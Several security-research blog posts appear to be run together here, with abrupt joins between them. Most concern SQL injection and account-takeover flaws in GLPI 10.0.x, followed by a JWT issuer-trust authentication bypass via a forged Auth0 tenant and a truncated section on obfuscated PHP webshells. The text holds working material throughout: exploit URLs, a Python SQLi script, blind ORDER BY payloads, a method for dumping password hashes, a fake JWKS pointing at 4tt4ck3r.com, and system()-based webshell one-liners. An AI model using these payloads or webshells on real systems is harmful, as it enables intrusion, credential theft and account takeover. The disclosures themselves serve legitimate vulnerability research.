Another similar injection point was found in CommonGLPI::updateDisplayOptions. This routine can be called from front/display.options.php.

At this moment, I knew that I would need to have a valid $_GET['itemtype'], probably $_GET['sub_itemtype'], and also either $_GET['update'] or $_GET['reset'], to reach this call to CommonGLPI::updateDisplayOptions.

At line 1’285, a first call is made to getAvailableDisplayOptions. This routine is declared only in the class NetworkPort, which means that the calling object must be an instance of this class, thus giving us the expected value for $_GET['itemtype'].

At line 1’290, the magic happens: the array $display_options is created from $_SESSION['glpi_display_options'], but the assignment is made with the ampersand operator. It means that $display_options becomes a reference to the item having the key $sub_itemtype, creating it if non-existent. In other words, it means that we are able here to create an item having an arbitary name as a key.

php > $options = ['a' => 'A', 'b' => 'B'];
php > $x= &$options['c'];
php > var_dump($options);
array(3) {
  ["a"]=>
  string(1) "A"
  ["b"]=>
  string(1) "B"
  ["c"]=>
  &NULL
}

Finally, once the foreach loops have been executed, the routine exportArrayToDB is called, passing the variable $_SESSION['glpi_display_options'] as argument. The injected key would therefore be passed to exportArrayToDB without sanitisation, leading to another SQL injection. As a PoC, I used the following query:

http://172.16.103.130/front/display.options.php?itemtype=NetworkPort&update=&sub_itemtype=%27,name=char(0x70,0x77,0x6e)%20where%20`id`=2%20--%20-

Arguments are therefore:

• itemtype: NetworkPort
• update: empty
• sub_item: ',name=char(0x70,0x77,0x6e) where `id`=2 -- -

Visiting this link would then modify the username of the glpi user ! Although the GUI returns a warning message telling us that the action is not allowed, the update is performed.

These issues have been patched in GLPI version 10.0.16.

After being tasked with auditing GLPI 10.0.12, for which I uncovered two unknown vulnerabilities (CVE-2024-27930 and CVE-2024-27937), I became really interested in this solution, and decided to investigate further. As the version 10.0.13 and 10.0.14 were published, I took a close look at the patches, and analysed how efficient they were to tackle the reported vulnerabilities. I discovered that CVE-2024-27096, was insufficiently patched, and that an SQL injection was still possible (CVE-2024-31456). I reported it to the vendor, and as the subsequent release was published (10.0.15), it appeared that it patched another SQL injection (CVE-2024-29889).

This article then describes how I uncovered CVE-2024-31456 and how to exploit CVE-2024-29889, the one I missed.

Abusing CVE-2024-31456

As discussed in one of my previous articles, the SQLi referred to as CVE-2024-27096 was patched as follows, in the routine Search::manageParams:

This routine was called from /ajax/search.php, before calling Search::getDatas:

$search_params = Search::manageParams($itemtype, $_REQUEST);

if (isset($search_params['browse']) && $search_params['browse'] == 1) {
    $itemtype::showBrowseView($itemtype, $search_params, true);
} else {
    $results = Search::getDatas($itemtype, $search_params);
    $results['searchform_id'] = $_REQUEST['searchform_id'] ?? null;
    Search::displayData($results);
}

This routine is as follows:

public static function getDatas($itemtype, $params, array $forcedisplay = [])
{

    $data = self::prepareDatasForSearch($itemtype, $params, $forcedisplay);
    self::constructSQL($data);
    self::constructData($data);

    return $data;
}

The idea was therefore to check if the routine Search::prepareDatasForSearch could be called without passing through manageParams beforehand. If so, and if user-controlled data were involved, it could be a way to bypass the patch.

It appeared that such situation exists, in the file /ajax/map.php. The three routines prepareDatasForSearch, constructSQL and constructData are called without calling manageParams.

Code of /ajax/map.php:

One can therefore exploit it in the same way as CVE-2024-27096:

import requests
import sys

if len(sys.argv) < 3:
	print("Usage: %s <url> <cookie>" % sys.argv[0])

url = sys.argv[1]
cookie = sys.argv[2]
content = requests.get(url +"/front/preference.php", headers={"Cookie": cookie}).text
csrf = content.find("glpi:csrf_token")
csrf = content[csrf+26:csrf+90]
sqli_result = requests.post(url +"/ajax/map.php", headers = {"Cookie":cookie, "X-Glpi-Csrf-Token":csrf, "Content-Type":"application/x-www-form-urlencoded"}, data={"itemtype":"User", "params[sort][]":"1`,extractvalue(rand(),concat(CHAR(126),database())) -- -"}).text
print(sqli_result)

I reported this issue to the vendor and it was assigned the identifier CVE-2024-31456.

Abusing CVE-2024-29889

Description:

An authenticated user can exploit a SQL injection vulnerability in the saved searches feature to alter another user account data and take control of it.

Honestly, I analysed the saved searches features, but I miss this clever SQL injection. As it was published, I took a look at the patch, and tried to understand what was going wrong. The patch was as follows (partial):

I knew that an SQL injection was uncovered in a previous version, affecting the same feature (CVE-2023-43813), and I guessed it probably was due to an incomplete patch. As explained in the article Exploiting GLPI during a Red Team engagement, one could exploit CVE-2023-43813 by injecting the POST’ed parameter itemtype that was insufficiently sanitised, with a payload like:

IVOIRE', savedsearches_pinned=CHAR(123,34,84,105,99,107,101,116,34,58,49,125) -- -;

They could break outside the original query and inject their own. However, in version 10.0.14, such attack does not work anymore.

First steps

To begin with, I added a few lines in the PHP code to log the SQL queries being executed, and triggered the faulty feature, in ajax/pin_savedsearches.php.

A request containing the parameter itemtype=Ticket was sent, because it was about a search related to the created tickets. The SQL query executed behind the curtain was as follows:

UPDATE `glpi_users` SET `savedsearches_pinned` = '{"Ticket":1}', `date_mod` = '2024-05-09 08:43:21' WHERE `id` = '3'

The JSON object saved as savedsearches_pinned is created by the code at line 51 we saw earlier, by the routine exportArrayToDb. Trying to set the parameter itemtype=Ticket' (notice the quote) would not work, because Ticket' could not resolve to a valid class name, making the application exit at line 45.

Another injection point

Since the only POST’ed parameter that was sent was itemtype, it seemed logical that the injection point was somewhere else. Since the two values that were passed to User::update were the ID of the user and $_SESSION['glpisavedsearches_pinned'], I had the feeling that the latter was probably the culprit.

Here is the clean code of the file (I added comments):

include('../inc/includes.php');

header('Content-Type: application/json; charset=UTF-8');
Html::header_nocache();

Session::checkLoginUser();

//we need to have a valid class name for $_POST["itemtype"]
if (!is_string($_POST['itemtype']) || getItemForItemtype($_POST['itemtype']) === false) {
    echo json_encode(['success' => false]);
    exit();
}

//kind of "json_decode"
$all_pinned = importArrayFromDB($_SESSION['glpisavedsearches_pinned']);
//if the parsed JSON stream contains a key that is the POST'ed itemtype
$already_pinned = $all_pinned[$_POST['itemtype']] ?? 0;
// $all_pinned[$_POST['itemtype']] wil be either 0 or 1, so useless for us
$all_pinned[$_POST['itemtype']] = $already_pinned ? 0 : 1;
//$all_pinned as JSON stream is saved as $_SESSION['glpisavedsearches_pinned']
$_SESSION['glpisavedsearches_pinned'] = exportArrayToDB($all_pinned);

$user = new User();
$success = $user->update(
    [
        'id'                   => Session::getLoginUserID(), //the ID of the user, normally cannot be altered
        'savedsearches_pinned' => $_SESSION['glpisavedsearches_pinned'], //the modified $_SESSION['glpisavedsearches_pinned']
    ]
);

echo json_encode(['success' => $success]);

The value of $_SESSION['glpisavedsearches_pinned'] toggles the state of a search (pinned or not / 1 or 0), and is supposed to contain a JSON object. Since there was an SQL injection, it seemed obvious to me that there was a way to manipulate $_SESSION['glpisavedsearches_pinned'], that would be passed unsanitised to the routine User::update. I then grep‘ed through the source code, looking for the regex \$_SESSION\[.*=. A bunch of results was returned, but sorting the results highlighted one line in src/User.php:

This piece of code was called when a user updates their preferences. If the name of the preference belongs to the list $CFG_GLPI['user_pref_field'], then it is stored in the $_SESSION, by prepending its name with the string ‘glpi’. I then edited my preferences and captured the request:

The parameter savedsearches_pinned was not set by default, but since the list $CFG_GLPI['user_pref_field'] is as follows (in inc/define.php), one could add the parameter savedsearches_pinned to hopefully write an arbitrary value in $_SESSION['glpisavedsearches_pinned']:

In other words, it means that we could use the preferences editing functionality to write something arbitrary to $_SESSION['glpisavedsearches_pinned'] since the key savedsearches_pinned belongs to $CFG_GLPI['user_pref_field'].

Building the payload

To make it work, one then first needs to update their preferences. To do so, simply edit them through the interface and send the request to the Burp’s Repeater. A CSRF token is in use, but it is not really problematic, because the error page would return a valid one. Therefore, a first faulty request should be sent to get a valid token, and the request should be resent with the expected value. Let’s send a first request with a POST’ed savedsearches_pinned to see its impact on the SQL request.

Editing the preferences:

Then trigger the vulnerable code, performing the SQL query:

The logged SQL query was as follows:

UPDATE `glpi_users` SET `savedsearches_pinned` = '{"test'":42,"Ticket":1}', `date_mod` = '2024-05-09 16:02:05' WHERE `id` = '3'

One can notice that the single quote is not escaped, breaking the JSON string, and thus making the SQL query invalid. As a proof-of-concept, let’s modify the username of the user glpi, having the ID 2.

The query is as follows:

UPDATE `glpi_users` SET `savedsearches_pinned` = '{"test', `name`=char(0x70,0x77,0x6e) where `id`=2; -- ":42,"Ticket":1}', `date_mod` = '2024-05-09 16:12:16' WHERE `id` = '3'

and the users table is now updated (:

Conclusion

The version 10.0.14 addressed two SQL injections, that were due to incomplete patches for the vulnerabilities CVE-2024-27096 and CVE-2023-43813. The first one (CVE-2024-31456, the one I reported) was quite easy to exploit, only finding a path in the code the called the vulnerable function without passing through the patched routine. The second one (CVE-2024-29889, the one I missed) was trickier, leveraging a permissive preference editing feature to inject a value inside the $_SESSION. The value was passed unsanitised enough to User::update, making an authenticated attacker able to manipulate any record inside the glpi_users table.

References

• Exploiting GLPI during a Red Team engagement
• GHSA: Account takeover via SQL Injection in saved searches feature
• Patch for CVE-2024-29889
• GHSA: Authenticated SQL injection
• Patch for CVE-2024-31456

A few weeks ago, I discovered during an intrusion test two vulnerabilities affecting GLPI 10.0.12, that was the latest public version at this time. The vendor was notified and released a patch after a couple of days, and I saw in the release notes that someone found an SQL injection in the same version. I was a little bit surprised (and also a bit disappointed to not have found it myself, I have to admit), and I was really curious about the exploitation details. Since the vendor did not disclose them, the only thing I had at this moment was the advisory and a link to the patch, referenced by the CVE bulletin:

When I wrote this article, I realised that the reporter published a blogpost (see references) where details were pretty clear, but when I started to analyse the patch, they were not yet disclosed. Therefore, since the details are already public, I will not describe how I uncovered that flaw during my own analysis, but will focus on the way I exploited it.

The flaw

One can quickly see that something weird is happening when setting the parameter sort in search requests, to sort the results. In the patch, the values passed in the sort array were casted as integers, so it was likely that they were improperly compared against strings in the flawed version. In PHP 7.*, the loose comparison between strings and integers returns a positive answer if the string value starts with the expected integer. For instance, it would return true when computing 8 == "8-put-a-string-here". The quotes were escaped in the user inputs, but as long as the payload did not contain one, I could inject any string I wanted, and break outside the SORT clause.

When performing a research among the assets, the application dynamically builds a query based on the filters the user wants to apply. The sort parameter is supposed to contain integers that are mapped to column names, and the lack of explicit conversion opened the way to injections. To make things easier, I added a line to write the SQL queries into a text file, and saw that the faulty query was as follows:

SELECT DISTINCT
    `glpi_computers`.`id` AS id, 'glpi' AS currentuser,
    `glpi_computers`.`entities_id`,
    `glpi_computers`.`is_recursive`,
    `glpi_computers`.`name` AS `ITEM_Computer_1`,
    `glpi_computers`.`id` AS `ITEM_Computer_1_id`,
    `glpi_states`.`completename` AS `ITEM_Computer_31`,
    `glpi_manufacturers`.`name` AS `ITEM_Computer_23`,
    `glpi_computers`.`serial` AS `ITEM_Computer_5`,
    `glpi_computertypes`.`name` AS `ITEM_Computer_4`,
    `glpi_computermodels`.`name` AS `ITEM_Computer_40`,
    GROUP_CONCAT(
        DISTINCT CONCAT(
            IFNULL(`glpi_operatingsystems_9719987b154aaf3b42c3db32aef59090`.`name`, '__NULL__'),
            '$#$',`glpi_operatingsystems_9719987b154aaf3b42c3db32aef59090`.`id`)
        ORDER BY `glpi_operatingsystems_9719987b154aaf3b42c3db32aef59090`.`id` SEPARATOR '$$##$$') AS `ITEM_Computer_45`,
    `glpi_locations`.`completename` AS `ITEM_Computer_3`,
    `glpi_computers`.`date_mod` AS `ITEM_Computer_19`,
    GROUP_CONCAT(
        DISTINCT CONCAT(
            IFNULL(`glpi_deviceprocessors_7083fb7d2b7a8b8abd619678acc5b604`.`designation`, '__NULL__'),
            '$#$',`glpi_deviceprocessors_7083fb7d2b7a8b8abd619678acc5b604`.`id`)
        ORDER BY `glpi_deviceprocessors_7083fb7d2b7a8b8abd619678acc5b604`.`id` SEPARATOR '$$##$$') AS `ITEM_Computer_17`
FROM `glpi_computers`
...
WHERE `glpi_computers`.`is_deleted` = 0
    AND `glpi_computers`.`is_template` = 0
    AND ((
            (`glpi_computers`.`name`  LIKE '%my-search-term%' )
            OR  (`glpi_states`.`completename`  LIKE '%my-search-term%' ) 
            OR  (`glpi_manufacturers`.`name`  LIKE '%my-search-term%' ) 
            OR  (`glpi_computers`.`serial`  LIKE '%my-search-term%' )
            OR  (`glpi_computertypes`.`name`  LIKE '%my-search-term%' )
            OR  (`glpi_computermodels`.`name`  LIKE '%my-search-term%' )
            OR  (`glpi_operatingsystems_9719987b154aaf3b42c3db32aef59090`.`name`  LIKE '%my-search-term%' )
            OR  (`glpi_locations`.`completename`  LIKE '%my-search-term%' )
            OR  (CONVERT(`glpi_computers`.`date_mod` USING utf8mb4)  LIKE '%my-search-term%' )
        ))
GROUP BY `glpi_computers`.`id`
ORDER BY `ITEM_Computer_1hey-oh` ASC

(escaping sequences removed for readability)

One can see that the ORDER BY clause is injected, where ITEM_Computer_1hey-oh is supposed to be a column.

The error-based approach

In the article the security researcher published, they say that they first tried to exploit it with a time-based blind SQL injection, and then found an easier way with an error-based one. The trick they used is based on the function EXTRACTVALUE. The latter expects two arguments:

• xml_frag: an XML fragment where to search (haystack)
• xpath_expr: the XPATH expression coming as a search term (needle)

The idea is to pass the string to extract as the second argument, and the DBMS would complain because it is not a valid XPATH expression. They used the following payload:

1`,extractvalue(rand(),concat(CHAR(126),(SELECT database()),CHAR(126))) -- -

and got their answer in the web page. In this case, we extract the database name:

But what if the application would not have returned any error message ?

An uncommon content-based blind injection

As my grandma said, back in the days, we did not have SQLmap and had to do it by hand, today’s young people are so lazy, and I always prefer building the payloads myself too.

Generally speaking, content-based blind SQL injections rely on a dichotomic research, asking boolean questions to the DBMS, and comparing the results in terms of content-length, HTTP codes, or patterns. With patience and luck, an attacker may extract bit by bit the content of the database. In most of the examples one can find in the wild, the injection occurs in the WHERE clause, that makes the injection quite easy:

SELECT *
FROM the_table
WHERE id={input}
GROUP BY the_column ASC

As an input, we would have something like:

((select ascii(substr(password,1,1)) from glpi_users where id=2)>65)

that asks if the ASCII code of the first character of the password of user n°2 is greater than 65. The resulting query would therefore be:

SELECT * FROM the_table WHERE id=0 GROUP BY the_column ASC

-- or

SELECT * FROM the_table WHERE id=1 GROUP BY the_column ASC

which would probably lead to different generated web pages.

Depending on the answer, we would ask either:

((select ascii(substr(password,1,1)) from glpi_users where id=2)>32)

or

((select ascii(substr(password,1,1)) from glpi_users where id=2)>96)

in order to split in half the search space. Once the first character is found, we would restart by updating the arguments of SUBSTRING to uncover the second character and so on…

However, the situation was trickier here, because we would inject in the ORDER BY clause, and at this point of the query, SELECT, UNION, or WHERE are not allowed (and batch queries neither). The idea would be to abuse the injection to sort the results in different ways, according to the boolean question: if the answer is positive, then sort in one way, otherwise sort it differently. The elements would be the same, but displayed in a different order.

Injection in the ORDER BY clause

Multiple columns can be specified in the ORDER BY clause: the filter for the column n+1 would apply if the values for the column n are the same. For instance, if we have:

then doing SELECT * FROM users ORDER BY age,gender ASC would return this (Charlie goes first because he is younger, and then Alice takes the second place because F goes before M):

and SELECT * FROM users ORDER BY gender,age ASC would return this (Alice goes first because F goes before M, and Charlies takes the second place because he is younger than Bob):

Based on the query that we logged earlier, we know that we inject here:

ORDER BY `ITEM_Computer_{input}` ASC

We must therefore close the column name with a number and a backtick, then add another column name depending on the result of our boolean question, and finally add a backtick and a third column name to properly inject. Fortunately, the ORDER BY clause accepts the CASE ... WHEN ... THEN structure, like this:

ORDER BY
    `ITEM_Computer_40`,
    (
        CASE
            WHEN 1=0 THEN
                `glpi_computers`.`id`
            ELSE
                `glpi_computers`.`name`
        END
    ),
    `glpi_computers`.`is_recursive`
ASC

The idea was to select as the first column something that would be the same for at least two elements, so that the second column would apply (and the latter must contain different values to make the sorting different). If the condition is true, then the sorting applies on glpi_computers.id, otherwise it would be on glpi_computers.name. The third column does not really matter.

This attack can be performed by a low-privileged user who can only see the tickets (like post-only)

References

1. Exploiting GLPI during a Red Team engagement

Since GLPI is a free piece of software, I decided to install my own local instance, and I have to admit, it was really straightforward. After a few minutes, I had it running on a fresh Ubuntu server VM. After a few days of research, a pair of vulnerabilities finally came to light: as a low-privileged user, it was possible to take over the super-admin’s account.

A first oddity

By using the built-in post-only account, features are quite limited. This account is only allowed to create tickets, but is not supposed to enumerate others users nor to see advanced settings.

However, one can notice a first interesting thing by creating a new ticket, and trying to add watchers: an AJAX call is made to /ajax/actors.php, returning details about existing users and groups (while the Users menu was not available to this user) …

One can see that the query contains a parameter named entity_restrict. If the application is used to manage multiple entities (kind of tenants), it can be abused to enumerate the users of another one, which is not supposed to be permitted. For instance, resending the same request with the entity_restrict equal to 1 would return additional users, belonging to another entity. This issue is tracked as CVE-2024-27937.

By taking a look at the source code of /ajax/actors.php, one can see that such AJAX call would eventually trigger the function User::getSqlSearchResult, but only the following fields are returned to the user:

$results[] = [
    'id'                => "User_$ID",
    'text'              => $text,
    'title'             => sprintf(__('%1$s - %2$s'), $text, $user['name']),
    'itemtype'          => "User",
    'items_id'          => $ID,
    'use_notification'  => strlen($user['default_email'] ?? "") > 0 ? 1 : 0,
    'default_email'     => $user['default_email'],
    'alternative_email' => '',
];

Interesting, because one could therefore leak personal details of other users, but not sufficient :grin:

Dropdowns

GLPI creates numerous relationships between objects, with Users creating Tickets about Computers, pieces of Software, etc. The application therefore heavily relies on dropdown list widgets to make it easy, the latter being populated based on the requested object types and user’s rights. For instance, the /ajax folder contains the following scripts, meant to build such widgets:

• getDropdownFindNum.php
• dropdownMassiveActionAddActor.php
• dropdownProjectTaskTicket.php
• getDropdownUsers.php
• dropdownValidator.php
• dropdownShowIPNetwork.php
• dropdownNotificationEvent.php
• dropdownMassiveActionAuthMethods.php
• dropdownConnectNetworkPort.php
• dropdownConnectNetworkPortDeviceType.php
• getDropdownConnect.php
• dropdownMassiveAction.php
• getDropdownNumber.php
• dropdownAllItems.php
• dropdownMassiveActionField.php
• dropdownUnicityFields.php
• getShareDashboardDropdownValue.php
• dropdownSoftwareLicense.php
• dropdownInstallVersion.php
• dropdownMassiveActionOs.php
• dropdownTrackingDeviceType.php
• dropdownTicketCategories.php
• dropdownFieldsBlacklist.php
• dropdownNotificationTemplate.php
• dropdownTypeCertificates.php
• dropdownLocation.php
• getAbstractRightDropdownValue.php
• dropdownValuesBlacklist.php
• dropdownMassiveActionAddValidator.php
• dropdownDelegationUsers.php
• dropdownConnect.php
• getDropdownValue.php
• dropdownRubDocument.php
• dropdownItilActors.php

These scripts call routines of the class Dropdown, which is meant to Print out an HTML “<select>” for a dropdown with preselected value, as said by a comment in the aforementionned class. Normally, these routines are supposed to only display specific types of objects, for example (in dropdownLocation.php) this one with Location instances:

echo Location::dropdown([
    'value'        => $locations_id,
    'entity'       => $entities_id,
    'entity_sons'  => $is_recursive,
]);

But what if we could ask for a dropdown containing arbitrary objects ?

A suspicious parameter

GLPI offers a lot of menus, and I quickly got overwhelmed by the huge amount of requests that my browser sent. However, a request caught my attention, while trying to link a ticket to another one:

This request seemed to return a set of objects (Ticket) with some parameters. Interestingly enough, the field id, specified with the parameter displaywith, is returned in the answer. It really sounds like an SQL-query-as-a-service, so what if one asks for the item type User, displayed with the field password ?

The file /ajax/getdropdownValue.php is as follows, forwarding the POST’ed data to Dropdown::getDropdownValue:

A first check against what is named an IDOR token is made (line 2’619), and if everything goes well, a new object is created based on the advertised itemtype. If the parameter displaywith exists, then it persists inside the $post array, and instructs the function to include specific additional fields in the response. By reading the code thoroughly, one can realise that the POST’ed data are used to build the query without checking the access rights regarding the expected table. So normally, I should have been able to enumerate the table glpi_users and ask for any field in this table, but obvisouly, there was a catch …

N.B. the value of itemtype is not exactly the name of a DB table. It is supposed to be the name of a PHP class, inherited from the class CommonDBTM. Each child class is supposed to have its matching DB table, therefore one should set it to User (the PHP class) to read from the table glpi_users (or equivalent).

A strange protection mechanism

To make it work, the request must be authenticated, and this is done with the cookies. Moreover, AJAX calls made through POST need to contain the header X-Glpi-Csrf-Token. The appropriate value can be found in the meta tag glpi:csrf_token, in HTML pages returned by the application:

<meta property="glpi:csrf_token" content="1fed5029e3d6a73af3352791f7ecff41e79c7644cbd89cf41d1b3e46e6ca99b6">

One important thing to notice is that dropdown lists are not directly written inside the HTML pages returned by the server. Instead, a piece of JavaScript code is returned, that would retrieve on-demand the list of the objects to display, and populate the dropdown lists. Therefore, an additional parameter named _idor_token must be put in the request body sent by JavaScript, in order to prevent from unauthorised access (hence the call to validatIDOR). The idea is that an IDOR token is tied to an object type, a set of rights, an entity, and for a limited time. Multiple _idor_tokens can be found in a page (one per dropdown list), and for instance, a first one is used to get the list of the tickets, another one for the list of the users, and another one for the list of the machines.

Different ways exist to obtain an IDOR token, and they can be found by searching for calls to Session::getNewIDORToken in the source code. One of them is done in User::dropdown, which can be called from /ajax/dropdownValidator.php.

In the response, one can see that an IDOR token to enumerate users is returned. However, querying the endpoint /ajax/getdropdownValue.php by specifying the parameter _idor_token and itemtype does not work, and returns a blank page. By debugging the programme, one can realise that it is because of a failing check during the IDOR token validation.

To investigate and get clues about what was going wrong, I added a few lines in the file src/Session.php to print the current state of each IDOR token (not the cleanest way to debug, but easier and sufficient enough):

By taking a look at the debug log, one can realise that the expected token is tied to an associative array with the keys itemtype, right and entity_restrict while our token only contains itemtype. I then asked for a new token, with the expected claims:

N.B: note that the names of the POST parameters and the keys of the expected elements in the array of IDOR tokens are not the same, but this is how it works. To have an appropriate entity_restrict, the POST parameter to set in the first request is entity.

Now, by setting the parameter displaywith[]=password (can be specified multiple times), one can therefore extract all the hashes from the database. However, there can be hashed with bcrypt, and if they are strong enough, they might be uncrackable.

Yay :smile:

Another way to abuse such feature and compromise an account is to extract email addresses (first vulnerability), and ask for a password reset. The token would be stored as password_forget_token in the DB. The emails addresses are not stored in the same table, but as we saw at the beginning while requesting /ajax/actors.php, they can be easily obtained.

Ask for any table

Since IDOR tokens are tied to an item type, one needs to obtain a valid one for each DB table. So far, it was possible because the script /ajax/dropdownValidator.php could return a piece of code to retrieve the list of the users, but what if we want to dump the content of the table glpi_configs ? A more generic way to obtain tokens exists, because of an arbitrary object creation. Let’s take /ajax/cable.php as an example (not the only one):

The item type is taken right from $_POST["itemtype"], and the static routine dropdown is called on the advertised class, meaning that any child of CommonDBTM could be enumerated. To begin with, a request can be sent to /ajax/cable.php, specifying the appropriate action and itemtype parameters:

In the first request, one can see that application returns a token alongside the attributes right=id and entity_restrict=-1. In the second request, these attributes must match, otherwise nothing is returned.

Now, let’s retry it with the table glpi_configs:

This issue is tracked as CVE-2024-27930.

So what ?

In a real world scenario, an attacker might try to enumerate the email addresses to find the admin’s one, ask for a password reset link, and abuse the second vulnerability to recover it. Once connected as super admin, there is a plenty of interesting things to do. I guess that one of the most straightforward ways to RCE is to add a plugin, like shellcommands.

The issues were reported to the vendor and patched in a few days. Let’s note that the description for CVE-2024-27930 was registered as:

GLPI is a Free Asset and IT Management Software package, Data center management, ITIL Service Desk, licenses tracking and software auditing. An authenticated user can access sensitive fields data from items on which he has read access. This issue has been patched in version 10.0.13.

This is not entirely true, since an authenticated user can access any type of object (child of CommonDBTM), regardless of their privileges.

Once upon a time, there was a C# single-page application using JWTs for both authentication and authorisation, being managed by the service Auth0. To make things more flexible, the address of the validator was not hardcoded, but dynamically retrieved with something like this:

var jwt       = new JwtSecurityTokenHandler().ReadToken(token);
var iss       = jwt.Claims.FirstOrDefault(x => x.Type == "iss");
...

var configManager = new ConfigurationManager<OpenIdConnectConfiguration>($"{iss}/.well-known/openid-configuration", new OpenIdConnectConfigurationRetriever());
var openIdConfig  = configManager.GetConfigurationAsync().Result;
var signingKeys   = new[]{openIdConfig.JsonWebKeySet.GetSigningKey().FirstOrDefault(x => x.KeyId == kid)} ;
var tokenParams   = new Microsoft.IdentityModel.TokensTokenValidationParameters() {
  ...
  IssuerSigningKeyResolver = signingKeys
}
var claims        = jwt.ValidateToken(jwttoken, tokenParams, out var tokenout)

For those who get pimples while reading C#, this code can be summarised as follows: the URL of the issuer (and thus the verifier) is extracted from the token, and used to build the URL to the OIDC configuration. From there, public keys are fetched, in order to use them for token verification. In other words, it is like having a token claiming “Hey app, go ask this server to verify that I am valid !”. I should have been able to sign a token with my private key, and instruct the vulnerable app to fetch my public key to verify. But of course, there was a catch …

First try: from arbitrary SSRF to auth bypass

By taking a look at a genuine token, I saw what the kid was supposed to be (let’s say that "kid": "wow-I-am-the-keyid"). I then created a fake configuration like this, based on the genuine one, and hosted it on my server (notice the jwks_uri)

openid-configuration

{
  "issuer":"https://v1ct1m.auth0.com/",
  "authorization_endpoint":"https://v1ct1m.auth0.com/authorize",
  "token_endpoint":"https://v1ct1m.auth0.com/oauth/token",
  "device_authorization_endpoint":"https://v1ct1m.auth0.com/oauth/device/code",
  "userinfo_endpoint":"https://v1ct1m.auth0.com/userinfo",
  "mfa_challenge_endpoint":"https://v1ct1m.auth0.com/mfa/challenge",
  "jwks_uri":"https://4tt4ck3r.com/jwks.json",
  "registration_endpoint":"https://v1ct1m.auth0.com/oidc/register",
  "revocation_endpoint":"https://v1ct1m.auth0.com/oauth/revoke",
  "scopes_supported":[
    "openid","profile",...
  ],
...
}

jwks.json

{
  "keys":[
    {
      "kty":"RSA",
      "use":"sig","n":" ... here goes the modulus ...",
      "e":"AQAB",
      "kid":"wow-I-am-the-keyid",
      ...
      "alg":"RS256"}
  ]
}

I then edited the genuine token and replaced the iss by my server’s URL, resent a request, and … nothing worked, I only got timeouts. With trial and error, I finally realised that there probably was an allowlisting, preventing the app from contacting arbitrary remote hosts. Only subdomains of Auth0 seem to be allowed, and therefore, I knew what I had to do next: create my own instance !

Creating my own Auth0 instance

The idea was simple: creating my own Auth0 instance, and use it to forge tokens that would be accepted by the vulnerable app. Adjusting claims and users, and it should be fine. Although my first idea was to export my private keys and sign arbitrary tokens, I did not find how to do so.

Step 1: Creating a dummy app

First thing was to create a dummy application, so that an authentication endpoint would be configured.

From the Auth0 dashboard, I modified the Default application by setting some URLs:

• callback: http://localhost:3000/callback
• allowed logout: http://localhost:3000
• allowed web origins: http://localhost:3000

This localhost:3000 comes from the fact that my dummy app would run on localhost:3000, more on this later.

Step 2: Create a copycat user

Since my goal was to connect as bob@mail.local on the victim application, I needed to create a fake user with the same username, able to connect on my fake app. It would therefore give me a token for this dummy user, that the victim app would also accept (note that having the same username is not always necessary, but it populates the claims consistently).

Step 3: Adding custom claims

The last challenge was to add custom claims that the victim app was expecting. The article Adding Custom Claims to ID Tokens with Auth0 Actions describes how to do so, taking as an example the application assign-random-dog, that is meant to run on localhost:3000.

Since the application expected a claim email_address, I configured an Action to do so, adding this claim after user authentication (only for Bob here, because it’s the one I was interested in).

Finally, by deploying the Action and running npm start in the assign-random-dog directory on my laptop, it opened the dummy app. Clicking on Log in redirects to Auth0, asking for the credentials, and I therefore entered Bob’s ones.

A successful authentication would redirect to the dummy app, and by visiting the Profile page while taking a look at the requests being sent, one can see that a token is obtained:

{
  "access_token": "...",
  "id_token": "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6Im9SSk9IN1ZRclE4a3ZNTnRzZFlMMyJ9.eyJlbWFpbF9hZGRyZXNzIjoiYm9iQG1haWwubG9jYWwiLCJuaWNrbmFtZSI6ImJvYiIsIm5hbWUiOiJib2JAbWFpbC5sb2NhbCIsInBpY3R1cmUiOiJodHRwczovL3MuZ3JhdmF0YXIuY29tL2F2YXRhci8wYmY4NGYwZTQzMmUzZGZkOTY5MWM3YTE0ZDU4ZjgyND9zPTQ4MCZyPXBnJmQ9aHR0cHMlM0ElMkYlMkZjZG4uYXV0aDAuY29tJTJGYXZhdGFycyUyRmJvLnBuZyIsInVwZGF0ZWRfYXQiOiIyMDIzLTEyLTI4VDE5OjU1OjA0LjI1MFoiLCJlbWFpbCI6ImJvYkBtYWlsLmxvY2FsIiw...FRsZFRTMWhyYmt0VlpRPT0ifQ.o2F5z...EO9ZEIMw",
  "scope": "openid profile email",
  "expires_in": 86400,
  "token_type": "Bearer"
}

Once decoded, the body contains:

{
  "email_address":"bob@mail.local",
  "nickname":"bob",
  "name":"bob@mail.local",
  "picture":"https://s.gravatar.com/avatar/0bf84f0e432e3dfd9691c7a14d58f824?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fbo.png",
  "updated_at":"2023-12-28T19:55:04.250Z",
  email":"bob@mail.local",
  email_verified":true,
  "iss":"https://dev-....eu.auth0.com/",
...
}

This token could be used on the victim app as well, since the latter would happily validate it with my public key, and since the user bob@mail.local was recognised !

Bottomline

• Verify and then trust
• As a security researcher, it is worth trying to modify claims containing URLs to see if an SSRF exists
• It is not because cryptomagic happens that everything is secure

The latter could also be dynamically retrieved thanks to a variable function

//technique 1
echo system(filter_input(0, 'A'));
//technique 2
echo system(${"_"."POST"}["B"]);
//technique 3
echo system(file_get_contents("php://input"));
//technique 4
echo system(get_defined_vars()[array_keys(get_defined_vars())[1]]["C"]);
//technique 5
$x = '_'.'POST';
echo system($$x['D']);

However, my favourite webshell is something like $_GET['a']($_GET['b']) because it makes it possible to call any function that takes a single argument (string, array or null). However, as stated in the documentation:

Variable functions won’t work with language constructs such as echo, print, unset(), isset(), empty(), include, require and the like

and for some others, they cannot be dynamically called:

var_dump("get_def"."ined_vars"()); //okay
var_dump(("get_defin"."ed_vars")()); //also okay
$x="get_defined_vars"; var_dump($x()); //not okay
var_dump(($x="get_defined_vars")()); //also not okay

NOTE: eval cannot be used as variable function, since it is a language construct and not a true function

However, PHP is really (REALLY) permissive, and it’s quite easy to call most of the functions while hiding their name. Let’s discuss four techniques with their own peculiarities, executing something like:

$_GET['a']($_GET['b']);

Technique #1: No letters, no quotes

This first technique gets rid of quotes and letters, but using heredocs strings.

As the doc says:

A third way to delimit strings is the heredoc syntax: «<. After this operator, an identifier is provided, then a newline. The string itself follows, and then the same identifier again to close the quotation.

Heredocs makes it possible to create multiline strings, such as:

$var = <<<_
Hello world
_;

In this case, the identifier is a simple underscore symbol. Note that the new lines after the first marker and before the second one are not part of the string. It means that echo "*$var/"; would print *Hello world/.

